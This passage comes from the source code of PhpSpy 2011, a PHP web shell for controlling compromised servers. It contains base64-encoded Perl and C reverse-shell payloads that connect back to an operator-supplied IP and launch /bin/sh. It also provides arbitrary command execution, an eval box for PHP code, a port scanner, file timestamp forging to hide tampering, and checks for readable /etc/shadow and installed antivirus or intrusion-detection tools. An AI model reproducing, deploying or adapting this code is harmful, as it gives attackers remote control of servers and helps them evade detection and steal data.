 1193.                 p('<form action="'.$self.'" method="POST">');
 1194.                 makehide('action','mysqladmin');
 1195.                 p($dbform);
 1196.                 p('<tr class="head">');
 1197.                 p('<td width="2%" align="center">&nbsp;</td>');
 1198.                 p('<td>Name</td>');
 1199.                 p('<td>Rows</td>');
 1200.                 p('<td>Data_length</td>');
 1201.                 p('<td>Create_time</td>');
 1202.                 p('<td>Update_time</td>');
 1203.                 if ($highver) {
 1204.                     p('<td>Engine</td>');
 1205.                     p('<td>Collation</td>');
 1206.                 }
 1207.                 p('<td>Operate</td>');
 1208.                 p('</tr>');
 1209.                 foreach ($tabledb as $key => $table) {
 1210.                     $thisbg = bg();
 1211.                     p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 1212.                     p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
 1213.                     p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
 1214.                     p('<td>'.$table['Rows'].'</td>');
 1215.                     p('<td>'.$table['Data_length'].'</td>');
 1216.                     p('<td>'.$table['Create_time'].'&nbsp;</td>');
 1217.                     p('<td>'.$table['Update_time'].'&nbsp;</td>');
 1218.                     if ($highver) {
 1219.                         p('<td>'.$table['Engine'].'</td>');
 1220.                         p('<td>'.$table['Collation'].'</td>');
 1221.                     }
 1222.                     p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
 1223.                     p('</tr>');
 1224.                 }
 1225.                 p('<tr class="head">');
 1226.                 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
 1227.                 p('<td>Name</td>');
 1228.                 p('<td>Rows</td>');
 1229.                 p('<td>Data_length</td>');
 1230.                 p('<td>Create_time</td>');
 1231.                 p('<td>Update_time</td>');
 1232.                 if ($highver) {
 1233.                     p('<td>Engine</td>');
 1234.                     p('<td>Collation</td>');
 1235.                 }
 1236.                 p('<td>Operate</td>');
 1237.                 p('</tr>');
 1238.                 p('<tr class='.bg().'>');
 1239.                 p('<td>&nbsp;</td>');
 1240.                 p('<td>Total tables: '.$table_num.'</td>');
 1241.                 p('<td>'.$table_rows.'</td>');
 1242.                 p('<td>'.$data_size.'</td>');
 1243.                 p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
 1244.                 p('</tr>');
 1245.  
 1246.                 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
 1247.                 makehide('doing','backupmysql');
 1248.                 formfoot();
 1249.                 p("</table>");
 1250.                 fr($query);
 1251.             }
 1252.         }
 1253.     }
 1254.     tbfoot();
 1255.     @mysql_close();
 1256. }//end mysql
 1257.  
 1258. elseif ($action == 'backconnect') {
 1259.     !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
 1260.     !$yourport && $yourport = '12345';
 1261.     $usedb = array('perl'=>'perl','c'=>'c');
 1262.  
 1263.     $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
 1264.         "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
 1265.         "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
 1266.         "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
 1267.         "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
 1268.         "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
 1269.         "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
 1270.     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
 1271.         "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
 1272.         "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
 1273.         "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
 1274.         "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
 1275.         "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
 1276.         "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
 1277.         "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
 1278.  
 1279.     if ($start && $yourip && $yourport && $use){
 1280.         if ($use == 'perl') {
 1281.             cf('/tmp/angel_bc',$back_connect);
 1282.             $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
 1283.         } else {
 1284.             cf('/tmp/angel_bc.c',$back_connect_c);
 1285.             $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
 1286.             @unlink('/tmp/angel_bc.c');
 1287.             $res = execute("/tmp/angel_bc $yourip $yourport &");
 1288.         }
 1289.         m("Now script try connect to $yourip port $yourport ...");
 1290.     }
 1291.  
 1292.     formhead(array('title'=>'Back Connect'));
 1293.     makehide('action','backconnect');
 1294.     p('<p>');
 1295.     p('Your IP:');
 1296.     makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
 1297.     p('Your Port:');
 1298.     makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
 1299.     p('Use:');
 1300.     makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
 1301.     makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
 1302.     p('</p>');
 1303.     formfoot();
 1304. }//end
 1305.  
 1306. elseif ($action == 'portscan') {
 1307.     !$scanip && $scanip = '127.0.0.1';
 1308.     !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
 1309.     formhead(array('title'=>'Port Scan'));
 1310.     makehide('action','portscan');
 1311.     p('<p>');
 1312.     p('IP:');
 1313.     makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
 1314.     p('Port:');
 1315.     makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
 1316.     makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
 1317.     p('</p>');
 1318.     formfoot();
 1319.  
 1320.     if ($startscan) {
 1321.         p('<h2>Result &raquo;</h2>');
 1322.         p('<ul class="info">');
 1323.         foreach(explode(',', $scanport) as $port) {
 1324.             $fp = @fsockopen($scanip, $port, $errno, $errstr, 1);
 1325.             if (!$fp) {
 1326.                 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
 1327.            } else {
 1328.                 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
 1329.                 @fclose($fp);
 1330.            }
 1331.         }
 1332.         p('</ul>');
 1333.     }
 1334. }
 1335.  
 1336. elseif ($action == 'eval') {
 1337.     $phpcode = trim($phpcode);
 1338.     if($phpcode){
 1339.         if (!preg_match('#<\?#si', $phpcode)) {
 1340.             $phpcode = "<?php\n\n{$phpcode}\n\n?>";
 1341.         }
 1342.         eval("?".">$phpcode<?");
 1343.     }
 1344.     formhead(array('title'=>'Eval PHP Code'));
 1345.     makehide('action','eval');
 1346.     maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
 1347.     p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
 1348.     formfooter();
 1349. }//end eval
 1350.  
 1351. elseif ($action == 'editfile') {
 1352.     if(file_exists($opfile)) {
 1353.         $fp=@fopen($opfile,'r');
 1354.         $contents=@fread($fp, filesize($opfile));
 1355.         @fclose($fp);
 1356.         $contents=htmlspecialchars($contents);
 1357.     }
 1358.     formhead(array('title'=>'Create / Edit File'));
 1359.     makehide('action','file');
 1360.     makehide('dir',$nowpath);
 1361.     makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
 1362.     maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
 1363.     formfooter();
 1364.    
 1365.     goback();
 1366.  
 1367. }//end editfile
 1368.  
 1369. elseif ($action == 'newtime') {
 1370.     $opfilemtime = @filemtime($opfile);
 1371.     //$time = strtotime("$year-$month-$day $hour:$minute:$second");
 1372.     $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
 1373.     formhead(array('title'=>'Clone folder/file was last modified time'));
 1374.     makehide('action','file');
 1375.     makehide('dir',$nowpath);
 1376.     makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
 1377.     makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
 1378.     formfooter();
 1379.     formhead(array('title'=>'Set last modified'));
 1380.     makehide('action','file');
 1381.     makehide('dir',$nowpath);
 1382.     makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
 1383.     p('<p>year:');
 1384.     makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
 1385.     p('month:');
 1386.     makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
 1387.     p('day:');
 1388.     makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
 1389.     p('hour:');
 1390.     makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
 1391.     p('minute:');
 1392.     makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
 1393.     p('second:');
 1394.     makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
 1395.     p('</p>');
 1396.     formfooter();
 1397.     goback();
 1398. }//end newtime
 1399.  
 1400. elseif ($action == 'shell') {
 1401.     if (IS_WIN && IS_COM) {
 1402.         if($program && $parameter) {
 1403.             $shell= new COM('Shell.Application');
 1404.             $a = $shell->ShellExecute($program,$parameter);
 1405.             m('Program run has '.(!$a ? 'success' : 'fail'));
 1406.         }
 1407.         !$program && $program = 'c:\windows\system32\cmd.exe';
 1408.         !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
 1409.         formhead(array('title'=>'Execute Program'));
 1410.         makehide('action','shell');
 1411.         makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
 1412.         p('<p>');
 1413.         makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
 1414.         makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
 1415.         p('</p>');
 1416.         formfoot();
 1417.     }
 1418.     formhead(array('title'=>'Execute Command'));
 1419.     makehide('action','shell');
 1420.     if (IS_WIN && IS_COM) {
 1421.         $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
 1422.         makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
 1423.     }
 1424.     p('<p>');
 1425.     makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
 1426.     makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
 1427.     p('</p>');
 1428.     formfoot();
 1429.  
 1430.     if ($command) {
 1431.         p('<hr width="100%" noshade /><pre>');
 1432.         if ($execfunc=='wscript' && IS_WIN && IS_COM) {
 1433.             $wsh = new COM('WScript.shell');
 1434.             $exec = $wsh->exec('cmd.exe /c '.$command);
 1435.             $stdout = $exec->StdOut();
 1436.             $stroutput = $stdout->ReadAll();
 1437.             echo $stroutput;
 1438.         } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
 1439.             $descriptorspec = array(
 1440.                0 => array('pipe', 'r'),
 1441.                1 => array('pipe', 'w'),
 1442.                2 => array('pipe', 'w')
 1443.             );
 1444.             $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
 1445.             if (is_resource($process)) {
 1446.                 fwrite($pipes[0], $command."\r\n");
 1447.                 fwrite($pipes[0], "exit\r\n");
 1448.                 fclose($pipes[0]);
 1449.                 while (!feof($pipes[1])) {
 1450.                     echo fgets($pipes[1], 1024);
 1451.                 }
 1452.                 fclose($pipes[1]);
 1453.                 while (!feof($pipes[2])) {
 1454.                     echo fgets($pipes[2], 1024);
 1455.                 }
 1456.                 fclose($pipes[2]);
 1457.                 proc_close($process);
 1458.             }
 1459.         } else {
 1460.             echo(execute($command));
 1461.         }
 1462.         p('</pre>');
 1463.     }
 1464. }//end shell
 1465.  
 1466. elseif ($action == 'phpenv') {
 1467.     $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
 1468.     $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
 1469.     !$dis_func && $dis_func = 'No';
 1470.     $info = array(
 1471.         1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
 1472.         2 => array('Server Domain',$_SERVER['SERVER_NAME']),
 1473.         3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
 1474.         4 => array('Server OS',PHP_OS),
 1475.         5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
 1476.         6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
 1477.         7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
 1478.         8 => array('PHP run mode',strtoupper(php_sapi_name())),
 1479.         9 => array('The file path',__FILE__),
 1480.  
 1481.         10 => array('PHP Version',PHP_VERSION),
 1482.         11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
 1483.         12 => array('Safe Mode',getcfg('safe_mode')),
 1484.         13 => array('Administrator',$adminmail),
 1485.         14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
 1486.         15 => array('enable_dl',getcfg('enable_dl')),
 1487.         16 => array('display_errors',getcfg('display_errors')),
 1488.         17 => array('register_globals',getcfg('register_globals')),
 1489.         18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
 1490.         19 => array('memory_limit',getcfg('memory_limit')),
 1491.         20 => array('post_max_size',getcfg('post_max_size')),
 1492.         21 => array('upload_max_filesize',$upsize),
 1493.         22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
 1494.         23 => array('disable_functions',$dis_func),
 1495.     );
 1496.  
 1497.     if($phpvarname) {
 1498.         m($phpvarname .' : '.getcfg($phpvarname));
 1499.     }
 1500.  
 1501.     formhead(array('title'=>'Server environment'));
 1502.     makehide('action','phpenv');
 1503.     makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
 1504.     formfooter();
 1505.  
 1506.     $hp = array(0=> 'Server', 1=> 'PHP');
 1507.     for($a=0;$a<2;$a++) {
 1508.         p('<h2>'.$hp[$a].' &raquo;</h2>');
 1509.         p('<ul class="info">');
 1510.         if ($a==0) {
 1511.             for($i=1;$i<=9;$i++) {
 1512.                 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
 1513.             }
 1514.         } elseif ($a == 1) {
 1515.             for($i=10;$i<=23;$i++) {
 1516.                 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
 1517.             }
 1518.         }
 1519.         p('</ul>');
 1520.     }
 1521. }//end phpenv
 1522.  
 1523. elseif ($action == 'secinfo') {
 1524.    
 1525.     secparam('Server software', @getenv('SERVER_SOFTWARE'));
 1526.     secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
 1527.     secparam('Open base dir', @ini_get('open_basedir'));
 1528.     secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 1529.     secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 1530.     secparam('cURL support', function_exists('curl_version')?'enabled':'no');
 1531.     $temp=array();
 1532.     if(function_exists('mysql_get_client_info'))
 1533.         $temp[] = "MySql (".mysql_get_client_info().")";
 1534.     if(function_exists('mssql_connect'))
 1535.         $temp[] = "MSSQL";
 1536.     if(function_exists('pg_connect'))
 1537.         $temp[] = "PostgreSQL";
 1538.     if(function_exists('oci_connect'))
 1539.         $temp[] = "Oracle";
 1540.     secparam('Supported databases', implode(', ', $temp));
 1541.    
 1542.     if( !IS_WIN ) {
 1543.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 1544.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
 1545.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 1546.         secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
 1547.         secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
 1548.         secparam('OS version', @file_get_contents('/proc/version'));
 1549.         secparam('Distr name', @file_get_contents('/etc/issue.net'));
 1550.         $safe_mode = @ini_get('safe_mode');
 1551.         if(!$GLOBALS['safe_mode']) {
 1552.             $temp=array();
 1553.             foreach ($userful as $item)
 1554.                 if(which($item)){$temp[]=$item;}
 1555.             secparam('Userful', implode(', ',$temp));
 1556.             $temp=array();
 1557.             foreach ($danger as $item)
 1558.                 if(which($item)){$temp[]=$item;}
 1559.             secparam('Danger', implode(', ',$temp));
 1560.             $temp=array();
 1561.             foreach ($downloaders as $item)
 1562.                 if(which($item)){$temp[]=$item;}
 1563.             secparam('Downloaders', implode(', ',$temp));
 1564.             secparam('Hosts', @file_get_contents('/etc/hosts'));
 1565.             secparam('HDD space', execute('df -h'));
 1566.             secparam('Mount options', @file_get_contents('/etc/fstab'));
 1567.         }
 1568.     } else {
 1569.         secparam('OS Version',execute('ver'));
 1570.         secparam('Account Settings',execute('net accounts'));
 1571.         secparam('User Accounts',execute('net user'));
 1572.         secparam('IP Configurate',execute('ipconfig -all'));
 1573.     }
 1574. }//end
 1575.  
 1576. else {
 1577.     m('Undefined Action');
 1578. }
 1579.  
 1580. ?>
 1581. </td></tr></table>
 1582. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
 1583.     <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
 1584.     Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
 1585. </div>
 1586. </body>
 1587. </html>
 1588.  
 1589. <?php
 1590.  
 1591. /*======================================================
 1592. º¯Êý¿â
 1593. ======================================================*/
 1594.  
 1595. function secparam($n, $v) {
 1596.     $v = trim($v);
 1597.     if($v) {
 1598.         p('<h2>'.$n.' &raquo;</h2>');
 1599.         p('<div class="infolist">');
 1600.         if(strpos($v, "\n") === false)
 1601.             p($v.'<br />');
 1602.         else
 1603.             p('<pre>'.$v.'</pre>');
 1604.         p('</div>');
 1605.     }
 1606. }
 1607. function m($msg) {
 1608.     echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
 1609.     echo $msg;
 1610.     echo '</div>';
 1611. }
 1612. function scookie($key, $value, $life = 0, $prefix = 1) {
 1613.     global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
 1614.     $key = ($prefix ? $cookiepre : '').$key;
 1615.     $life = $life ? $life : $cookielife;
 1616.     $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
 1617.     setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
 1618. }  
 1619. function multi($num, $perpage, $curpage, $tablename) {
 1620.     $multipage = '';
 1621.     if($num > $perpage) {
 1622.         $page = 10;
 1623.         $offset = 5;
 1624.         $pages = @ceil($num / $perpage);
 1625.         if($page > $pages) {
 1626.             $from = 1;
 1627.             $to = $pages;
 1628.         } else {
 1629.             $from = $curpage - $offset;
 1630.             $to = $curpage + $page - $offset - 1;
 1631.             if($from < 1) {
 1632.                 $to = $curpage + 1 - $from;
 1633.                 $from = 1;
 1634.                 if(($to - $from) < $page && ($to - $from) < $pages) {
 1635.                     $to = $page;
 1636.                 }
 1637.             } elseif($to > $pages) {
 1638.                 $from = $curpage - $pages + $to;
 1639.                 $to = $pages;
 1640.                 if(($to - $from) < $page && ($to - $from) < $pages) {
 1641.                     $from = $pages - $page + 1;
 1642.                 }
 1643.             }
 1644.         }
 1645.         $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
 1646.         for($i = $from; $i <= $to; $i++) {
 1647.             $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
 1648.         }
 1649.         $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
 1650.         $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
 1651.     }
 1652.     return $multipage;
 1653. }
 1654. // µÇ½Èë¿Ú
 1655. function loginpage() {
 1656. ?>
 1657.     <style type="text/css">
 1658.     input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
 1659.     </style>
 1660.     <form method="POST" action="">
 1661.     <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
 1662.     <input type="hidden" name="action" value="login">
 1663.     <input type="submit" value="Login">
 1664.     </form>
 1665. <?php
 1666.     exit;
 1667. }//end loginpage()
 1668.  
 1669. function execute($cfe) {
 1670.     $res = '';
 1671.     if ($cfe) {
 1672.         if(function_exists('system')) {
 1673.             @ob_start();
 1674.             @system($cfe);
 1675.             $res = @ob_get_contents();
 1676.             @ob_end_clean();
 1677.         } elseif(function_exists('passthru')) {
 1678.             @ob_start();
 1679.             @passthru($cfe);
 1680.             $res = @ob_get_contents();
 1681.             @ob_end_clean();
 1682.         } elseif(function_exists('shell_exec')) {
 1683.             $res = @shell_exec($cfe);
 1684.         } elseif(function_exists('exec')) {
 1685.             @exec($cfe,$res);
 1686.             $res = join("\n",$res);
 1687.         } elseif(@is_resource($f = @popen($cfe,"r"))) {
 1688.             $res = '';
 1689.             while(!@feof($f)) {
 1690.                 $res .= @fread($f,1024);
 1691.             }
 1692.             @pclose($f);
 1693.         }
 1694.     }
 1695.     return $res;
 1696. }
 1697. function which($pr) {
 1698.     $path = execute("which $pr");
 1699.     return ($path ? $path : $pr);
 1700. }
 1701.  
 1702. function cf($fname,$text){
 1703.     if($fp=@fopen($fname,'w')) {
 1704.         @fputs($fp,@base64_decode($text));
 1705.         @fclose($fp);
 1706.     }
 1707. }
 1708. function dirsize($dir) {
 1709.     $dh = @opendir($dir);
 1710.     $size = 0;
 1711.     while($file = @readdir($dh)) {
 1712.         if ($file != '.' && $file != '..') {
 1713.             $path = $dir.'/'.$file;
 1714.             $size += @is_dir($path) ? dirsize($path) : @filesize($path);
 1715.         }
 1716.     }
 1717.     @closedir($dh);
 1718.     return $size;
 1719. }
 1720. // Ò³Ãæµ÷ÊÔÐÅÏ¢
 1721. function debuginfo() {
 1722.     global $starttime;
 1723.     $mtime = explode(' ', microtime());
 1724.     $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
 1725.     echo 'Processed in '.$totaltime.' second(s)';
 1726. }
 1727.  
 1728. //Á¬½ÓMYSQLÊý¾Ý¿â
 1729. function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
 1730.     global $charsetdb;
 1731.     @ini_set('mysql.connect_timeout', 5);
 1732.     if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
 1733.         p('<h2>Can not connect to MySQL server</h2>');
 1734.         exit;
 1735.     }
 1736.     if($link && $dbname) {
 1737.         if (!@mysql_select_db($dbname, $link)) {
 1738.             p('<h2>Database selected has error</h2>');
 1739.             exit;
 1740.         }
 1741.     }
 1742.     if($link && mysql_get_server_info() > '4.1') {
 1743.         if($charset && in_array(strtolower($charset), $charsetdb)) {
 1744.             q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
 1745.         }
 1746.     }
 1747.     return $link;
 1748. }
 1749.  
 1750. // È¥µôתÒå×Ö·û
 1751. function s_array(&$array) {
 1752.     if (is_array($array)) {
 1753.         foreach ($array as $k => $v) {
 1754.             $array[$k] = s_array($v);
 1755.         }
 1756.     } else if (is_string($array)) {
 1757.         $array = stripslashes($array);
 1758.     }
 1759.     return $array;
 1760. }
 1761.  
 1762. // Çå³ýHTML´úÂë
 1763. function html_clean($content) {
 1764.     $content = htmlspecialchars($content);
 1765.     $content = str_replace("\n", "<br />", $content);
 1766.     $content = str_replace("  ", "&nbsp;&nbsp;", $content);
 1767.     $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
 1768.     return $content;
 1769. }
 1770.  
 1771. // »ñȡȨÏÞ
 1772. function getChmod($filepath){
 1773.     return substr(base_convert(@fileperms($filepath),10,8),-4);
 1774. }
 1775.  
 1776. function getPerms($filepath) {
 1777.     $mode = @fileperms($filepath);
 1778.     if (($mode & 0xC000) === 0xC000) {$type = 's';}
 1779.     elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
 1780.     elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
 1781.     elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
 1782.     elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
 1783.     elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
 1784.     elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
 1785.     else {$type = '?';}
 1786.  
 1787.     $owner['read'] = ($mode & 00400) ? 'r' : '-';
 1788.     $owner['write'] = ($mode & 00200) ? 'w' : '-';
 1789.     $owner['execute'] = ($mode & 00100) ? 'x' : '-';
 1790.     $group['read'] = ($mode & 00040) ? 'r' : '-';
 1791.     $group['write'] = ($mode & 00020) ? 'w' : '-';
 1792.     $group['execute'] = ($mode & 00010) ? 'x' : '-';
 1793.     $world['read'] = ($mode & 00004) ? 'r' : '-';
 1794.     $world['write'] = ($mode & 00002) ? 'w' : '-';
 1795.     $world['execute'] = ($mode & 00001) ? 'x' : '-';
 1796.  
 1797.     if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
 1798.     if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
 1799.     if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
 1800.  
 1801.     return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
 1802. }
 1803.  
 1804. function getUser($filepath) {
 1805.     if (function_exists('posix_getpwuid')) {
